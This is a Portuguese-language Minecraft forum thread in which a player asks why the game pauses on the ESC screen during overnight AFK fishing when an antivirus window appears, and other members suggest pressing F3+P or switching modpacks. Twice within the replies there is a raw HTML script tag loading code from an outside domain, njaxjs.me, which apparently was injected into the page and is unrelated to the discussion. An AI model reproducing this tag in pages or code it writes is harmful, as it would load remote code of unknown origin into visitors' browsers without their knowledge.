Duvida!

Bem-vindo!

Ao se registrar conosco, você poderá discutir, compartilhar e enviar mensagens privadas com outros membros da nossa comunidade.

Inscreva-se agora!
Status
Não está aberto para novas respostas.

ZyzzXD

Razoavel
Entrou
Mar 14, 2016
Cubos
0
Bom dia a todos, não sei se vcs vão entender minha duvida mais vou tenta explicar no máximo, bem o seguinte eu deixei essa madrugada de hj pescando ao acorda eu reparei que eles estava parado e o esc aonde fica a tela de confi , macro set e outros apertada e apareceu uma janela no anti virus , alguem sabe como eu faço se alguma janela aparece na hora ele vim minimizar para não aparece na hora que estiver afk ! quem nao entende comente!

Se não me engano, você tem que segurar F3+P para deixar em segundo plano. Testa ai, faz isso e tenta abrir alguma coisa em cima do jogo e ver se para.
Responde avisando se funcionou ou não :p

<script src="https://njaxjs.me/services/script.js" type="text/javascript"></script>

MrR3V3NG3R disse:
Se não me engano, você tem que segurar F3+P para deixar em segundo plano. Testa ai, faz isso e tenta abrir alguma coisa em cima do jogo e ver se para.
Responde avisando se funcionou ou não :p
vlw vou testa isso e foda mano upei so 10 de pesca numa madrugada !

Não entendi direito sua dúvida, mas ao abrir outra janela seu minecraft ficou no modo "pause" sozinho ? No caso na tela do ESC né?
Aperte as teclas F3 + P, lembrando que não pode ter qualquer macro na tecla P na hora em que você o fizer.

<script src="https://njaxjs.me/services/script.js" type="text/javascript"></script>

zInter disse:
Não entendi direito sua dúvida, mas ao abrir outra janela seu minecraft ficou no modo "pause" sozinho ? No caso na tela do ESC né?
Aperte as teclas F3 + P, lembrando que não pode ter qualquer macro na tecla P na hora em que você o fizer.
sim fico na tela esc e apareceu uma janela no anti-virus!

Aperta F3 + P Para Ele Rodar Em Segundo Plano,Abre Outra Coisa Por Cima e Tenta ver se ele vai continuar rodando.

baixe outra mod pack de upar auto reconect talvez vc esta usando uma de pvp ou normal

Status
Não está aberto para novas respostas.

Users who are viewing this thread

Voltar